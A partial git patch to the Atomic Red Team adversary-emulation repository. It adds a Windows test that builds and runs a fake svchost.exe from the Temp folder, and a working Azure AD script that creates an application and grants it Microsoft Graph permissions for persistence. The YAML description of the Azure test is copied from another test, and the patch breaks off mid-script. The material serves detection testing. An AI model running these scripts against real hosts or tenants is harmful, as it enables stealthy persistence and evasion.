Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1543.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.009","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1548.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1556.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1557.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1557","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1563.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1566.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1569.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1588.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]},{"techniqueID":"T1588","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 7f43ff3c..73650152 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -466,6 +466,7 @@ defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt defense-evasion,T1036,Masquerading,2,Malware Masquerading and Execution from Zip File,4449c89b-ec82-43a4-89c1-91e2f1abeecc,powershell defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh +defense-evasion,T1036.005,Match Legitimate Name or Location,2,Masquerade as a built-in system executable,35eb8d16-9820-4423-a2a1-90c4f5edd9ca,powershell defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 68768806..3a1e2069 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -298,6 +298,7 @@ defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt defense-evasion,T1036,Masquerading,2,Malware Masquerading and Execution from Zip File,4449c89b-ec82-43a4-89c1-91e2f1abeecc,powershell +defense-evasion,T1036.005,Match Legitimate Name or Location,2,Masquerade as a built-in system executable,35eb8d16-9820-4423-a2a1-90c4f5edd9ca,powershell defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 23251a3a..ff1fcce3 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -738,6 +738,7 @@ - Atomic Test #2: Malware Masquerading and Execution from Zip File [windows] - [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md) - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux] + - Atomic Test #2: Masquerade as a built-in system executable [windows] - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1112 Modify Registry](../../T1112/T1112.md) 
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 63f0ddce..ec79cb1c 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -507,7 +507,8 @@ - [T1036 Masquerading](../../T1036/T1036.md) - Atomic Test #1: System File Copied to Unusual Location [windows] - Atomic Test #2: Malware Masquerading and Execution from Zip File [windows] -- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) +- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md) + - Atomic Test #2: Masquerade as a built-in system executable [windows] - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1112 Modify Registry](../../T1112/T1112.md) - Atomic Test #1: Modify Registry of Current User Profile - cmd [windows] diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md index 596c3fd9..cf4b2f95 100644 --- a/atomics/Indexes/Matrices/windows-matrix.md +++ b/atomics/Indexes/Matrices/windows-matrix.md 
@@ -60,7 +60,7 @@ | | | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) | | | | | | | | | | | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | | | | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Masquerading](../../T1036/T1036.md) | | | | | | | | -| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | | +| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | | | | | | | | | | | [Scheduled Task](../../T1053.005/T1053.005.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | | | | | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Registry](../../T1112/T1112.md) | | | | | | | | | | | [Screensaver](../../T1546.002/T1546.002.md) | Time Providers [CONTRIBUTE A 
TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Mshta](../../T1218.005/T1218.005.md) | | | | | | | | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index f46f0ba2..3f4028e3 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -31192,6 +31192,36 @@ defense-evasion: cleanup_command: | rm -f $HOME/.../sh rmdir $HOME/.../ + - name: Masquerade as a built-in system executable + auto_generated_guid: 35eb8d16-9820-4423-a2a1-90c4f5edd9ca + description: 'Launch an executable that attempts to masquerade as a legitimate + executable. + +' + supported_platforms: + - windows + input_arguments: + executable_filepath: + description: File path where the generated executable will be dropped and + executed from. The filename should be the name of a built-in system utility. + type: String + default: "$Env:windir\\Temp\\svchost.exe" + executor: + command: | + Add-Type -TypeDefinition @' + public class Test { + public static void Main(string[] args) { + System.Console.WriteLine("tweet, tweet"); + } + } + '@ -OutputAssembly "#{executable_filepath}" + + Start-Process -FilePath "#{executable_filepath}" + cleanup_command: 'Remove-Item -Path "#{executable_filepath}" -ErrorAction + Ignore + +' + name: powershell T1556: technique: external_references: diff --git a/atomics/T1036.005/T1036.005.md b/atomics/T1036.005/T1036.005.md index 906ddca2..1d369e9b 100644 --- a/atomics/T1036.005/T1036.005.md +++ b/atomics/T1036.005/T1036.005.md @@ -8,6 +8,8 @@ Adversaries may also use the same icon of the file they are trying to mimic. @@ -48,4 +50,49 @@ rmdir $HOME/.../ +
+
+ +## Atomic Test #2 - Masquerade as a built-in system executable +Launch an executable that attempts to masquerade as a legitimate executable. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 35eb8d16-9820-4423-a2a1-90c4f5edd9ca + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| executable_filepath | File path where the generated executable will be dropped and executed from. The filename should be the name of a built-in system utility. | String | $Env:windir\Temp\svchost.exe| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Add-Type -TypeDefinition @' +public class Test { + public static void Main(string[] args) { + System.Console.WriteLine("tweet, tweet"); + } +} +'@ -OutputAssembly "#{executable_filepath}" + +Start-Process -FilePath "#{executable_filepath}" +``` + +#### Cleanup Commands: +```powershell +Remove-Item -Path "#{executable_filepath}" -ErrorAction Ignore +``` + + + + +
From 2be981e92d43f790af6c3f54c0a81ce5b3a51f50 Mon Sep 17 00:00:00 2001 From: WojciechLesicki Date: Sun, 6 Mar 2022 18:49:31 +0100 Subject: [PATCH 04/83] I added another atomic related to adding permission to the application in AzureAD. --- atomics/T1098/T1098.md | 103 +++++++++++++++++++++++++++++++++++++++ atomics/T1098/T1098.yaml | 88 +++++++++++++++++++++++++++++++++ 2 files changed, 191 insertions(+) diff --git a/atomics/T1098/T1098.md b/atomics/T1098/T1098.md index 08ccbe36..e7d4a010 100644 --- a/atomics/T1098/T1098.md +++ b/atomics/T1098/T1098.md @@ -18,6 +18,8 @@ - [Atomic Test #7 - Azure - adding service principal to Azure role in subscription](#atomic-test-7---azure---adding-service-principal-to-azure-role-in-subscription) +- [Atomic Test #8 - Azure - adding permission to application](#atomic-test-8---azure---adding-permission-to-application) +
@@ -504,3 +506,104 @@ Install-Module -Name Az.Resources -Force

+ +## Atomic Test #8 - Azure - adding permission to application +The adversarie want to add permission to new created application. Application could be then use for persistence or for further operation in the attacked infrastructure. Permissions like AppRoleAssignment.ReadWrite.All or RoleManagement.ReadWrite.Directory in particular can be a valuable target for a threat actor. +You can use Get-AzureADApplication instead New-AzureADServicePrincipal to use an existing application. +The DirectoryRecommendations.Read.All permissions have been selected as the default + +The account you use to run the PowerShell command should have Global Administrator/Application Administrator/Cloud Application Administrator role in your Azure AD. + +Detection hint - check Operation Name "Add app role assignment to service principal" in subscriptions Activity Logs. +You can also take a look at the materials: +https://learnsentinel.blog/2022/01/04/azuread-privesc-sentinel/ +https://github.com/reprise99/Sentinel-Queries +https://docs.google.com/presentation/d/1AWx1w0Xcq8ENvOmSjAJswEgEio-il09QWZlGg9PbHqE/edit#slide=id.g10460eb209c_0_2766 +https://gist.github.com/andyrobbins/7c3dd62e6ed8678c97df9565ff3523fb + +**Supported Platforms:** Azure-ad + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| username | Azure AD username | String | jonh@contoso.com| +| password | Azure AD password | String | p4sswd| +| application_name | Name of the targeted application | String | test_app| +| application_permission | Permission from Microsoft Graph Resource API that will be add to application from | String | DirectoryRecommendations.Read.All| + + +#### Attack Commands: Run with `powershell`! 
+ +```powershell +Import-Module -Name AzureAD + $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force + $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword + Connect-AzureAD -Credential $Credential + + $aadApplication = New-AzureADApplication -DisplayName "#{application_name}" + $servicePrincipal = New-AzureADServicePrincipal -AppId $aadApplication.AppId + #$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq "#{application_name}"} + + #Get Service Principal of Microsoft Graph Resource API + $graphSP = Get-AzureADServicePrincipal -All $true | Where-Object {$_.DisplayName -eq "Microsoft Graph"} + + #Initialize RequiredResourceAccess for Microsoft Graph Resource API + $requiredGraphAccess = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess + $requiredGraphAccess.ResourceAppId = $graphSP.AppId + $requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess] + + #Set Application Permissions + $ApplicationPermissions = @('#{application_permission}') + + $reqPermission = $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions} + if($reqPermission) + { + $resourceAccess = New-Object Microsoft.Open.AzureAD.Model.ResourceAccess + $resourceAccess.Type = "Role" + $resourceAccess.Id = $reqPermission.Id + #Add required app permission + $requiredGraphAccess.ResourceAccess.Add($resourceAccess) + } + else + { + Write-Host "App permission $permission not found in the Graph Resource API" -ForegroundColor Red + } + + #Add required resource accesses + $requiredResourcesAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess] + $requiredResourcesAccess.Add($requiredGraphAccess) + + #Set permissions in existing Azure AD App + Set-AzureADApplication -ObjectId $aadApplication.ObjectId -RequiredResourceAccess $requiredResourcesAccess + + 
$servicePrincipal = Get-AzureADServicePrincipal -All $true | Where-Object {$_.AppId -eq $aadApplication.AppId} + + New-AzureADServiceAppRoleAssignment -ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId -ResourceId $graphSP.ObjectId -Id $reqPermission.Id +``` + +#### Cleanup Commands: +```powershell +Import-Module -Name AzureAD + $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force + $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword + Connect-AzureAD -Credential $Credential + + $aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq "#{application_name}"} + Remove-AzureADApplication -ObjectId $aadApplication.ObjectId +``` + + +#### Dependencies: Run with `powershell`! +##### Description: AzureAD module must be installed. +##### Check Prereq Commands: +```powershell +try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AzureAD -Force +``` + +
+
diff --git a/atomics/T1098/T1098.yaml b/atomics/T1098/T1098.yaml index b615e766..73531f8d 100644 --- a/atomics/T1098/T1098.yaml +++ b/atomics/T1098/T1098.yaml 
@@ -411,3 +411,91 @@ atomic_tests:
 Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.Name) role in subscriptions $($subscriptions.Name)"
 name: powershell
 elevation_required: false
+
+- name: Azure - adding permission to application
+ description: |
+ The adversarie want to add service principal to some Azure role, also called Azure resource role. Threat actor
+ supported_platforms:
+ - azure-ad
+ input_arguments:
+ username:
+ description: Azure AD username
+ type: String
+ default: jonh@contoso.com
+ password:
+ description: Azure AD password
+ type: String
+ default: p4sswd
+ application_name:
+ description: Name of the targed application
+ type: String
+ default: test_app
+ application_permission:
+ description: Permission from Microsoft Graph Resource API that will be add to application
+ type: String
+ default: DirectoryRecommendations.Read.All
+ dependencies:
+ - description: |
+ AzureAD module must be installed.
+ prereq_command: |
+ try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+ get_prereq_command: |
+ Install-Module -Name AzureAD -Force
+ executor:
+ command: |
+ Import-Module -Name AzureAD
+ $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+ $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+ Connect-AzureAD -Credential $Credential
+
+ $aadApplication = New-AzureADApplication -DisplayName "#{application_name}"
+ $servicePrincipal = New-AzureADServicePrincipal -AppId $aadApplication.AppId
+ #$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq "#{application_name}"}
+
+ #Get Service Principal of Microsoft Graph Resource API
+ $graphSP = Get-AzureADServicePrincipal -All $true | Where-Object {$_.DisplayName -eq "Microsoft Graph"}
+
+ #Initialize RequiredResourceAccess for Microsoft Graph Resource API
+ $requiredGraphAccess = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess
+ $requiredGraphAccess.ResourceAppId = $graphSP.AppId
+ $requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess]
+
+ #Set Application Permissions
+ $ApplicationPermissions = @('#{application_permission}')
+
+ $reqPermission = $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions}
+ if($reqPermission)
+ {
+ $resourceAccess = New-Object Microsoft.Open.AzureAD.Model.ResourceAccess
+ $resourceAccess.Type = "Role"
+ $resourceAccess.Id = $reqPermission.Id
+ #Add required app permission
+ $requiredGraphAccess.ResourceAccess.Add($resourceAccess)
